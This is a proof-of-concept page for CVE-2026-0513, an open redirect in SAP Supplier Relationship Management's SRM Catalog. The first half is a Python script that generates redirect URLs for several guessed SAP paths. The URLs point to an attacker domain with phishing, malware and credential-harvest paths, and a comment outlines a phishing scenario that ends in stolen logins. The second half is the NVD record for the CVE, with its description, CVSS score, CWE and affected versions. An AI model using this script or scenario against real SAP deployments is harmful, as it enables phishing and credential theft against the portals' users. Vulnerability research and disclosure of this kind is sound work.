CVE-2026-0513

# CVE-2026-0513 Open Redirect PoC # Target: SAP Supplier Relationship Management (SRM Catalog) # Vulnerability: Open Redirect in SICF Handler import urllib.parse def generate_open_redirect_poc(base_url, target_domain): """ Generate malicious URL for open redirect attack Args: base_url: Original SAP SRM application URL target_domain: Attacker's controlled domain Returns: Malicious redirect URL """ # Common SICF Handler paths in SAP SRM sicf_paths = [ "/sap/bc/ui5_ui5/srm/catalog", "/sap/bc/ui2/srm/catalog", "/sap/opu/odata/sap/SRM_CATALOG", "/sap/bc/srt/scs/sap/SRM_CATALOG" ] malicious_urls = [] for path in sicf_paths: # Open redirect via 'redirect' parameter redirect_param = urllib.parse.quote(f"https://{target_domain}/phishing") malicious_url = f"{base_url}{path}?redirect={redirect_param}" malicious_urls.append(malicious_url) # Open redirect via 'url' parameter url_param = urllib.parse.quote(f"https://{target_domain}/malware") malicious_url2 = f"{base_url}{path}?url={url_param}" malicious_urls.append(malicious_url2) # Open redirect via 'returnUrl' parameter return_param = urllib.parse.quote(f"https://{target_domain}/credential_harvest") malicious_url3 = f"{base_url}{path}?returnUrl={return_param}" malicious_urls.append(malicious_url3) return malicious_urls # Example usage base_url = "https://sap-company.com" target_domain = "attacker-controlled-site.com" pocs = generate_open_redirect_poc(base_url, target_domain) print("CVE-2026-0513 Open Redirect Attack URLs:") for i, poc in enumerate(pocs, 1): print(f"{i}. {poc}") # Simple attack scenario: # 1. Attacker sends email with malicious link to victim # 2. Victim clicks link thinking it's legitimate SAP portal # 3. Browser redirects to attacker's phishing site # 4. Victim enters credentials on fake login page # 5. Attacker steals credentials

{"cve": {"id": "CVE-2026-0513", "sourceIdentifier": "[email protected]", "published": "2026-01-13T02:15:53.957", "lastModified": "2026-01-22T18:48:53.343", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to an Open Redirect Vulnerability in SAP Supplier Relationship Management (SICF Handler in SRM Catalog), an unauthenticated attacker could craft a malicious URL that, if accessed by a victim, redirects them to an attacker-controlled site.This causes low impact on integrity of the application. Confidentiality and availability are not impacted."}, {"lang": "es", "value": "Debido a una Vulnerabilidad de Redirección Abierta en SAP Supplier Relationship Management (controlador SICF en el catálogo SRM), un atacante no autenticado podría elaborar una URL maliciosa que, si es accedida por una víctima, la redirige a un sitio controlado por el atacante. Esto causa bajo impacto en la integridad de la aplicación. La confidencialidad y la disponibilidad no tienen impacto."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sap:supplier_relationship_management:700:*:*:*:*:*:*:*", "matchCriteriaId": "069741F5-9DC2-442A-B48B-B0C68A3A6950"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sap:supplier_relationship_management:701:*:*:*:*:*:*:*", "matchCriteriaId": "0C2110DB-3940-47AF-B878-EB8C6B4E8522"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sap:supplier_relationship_management:702:*:*:*:*:*:*:*", "matchCriteriaId": "292B51A4-91A2-49C7-A31D-C70DEB620FEB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sap:supplier_relationship_management:713:*:*:*:*:*:*:*", "matchCriteriaId": "D9A86731-3213-4ACD-968E-0EA7BEA1192D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sap:supplier_relationship_management:714:*:*:*:*:*:*:*", "matchCriteriaId": "EEE98FDD-55FA-4F88-AD58-7FE927129F97"}]}]}], "references": [{"url": "https://me.sap.com/notes/3638716", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}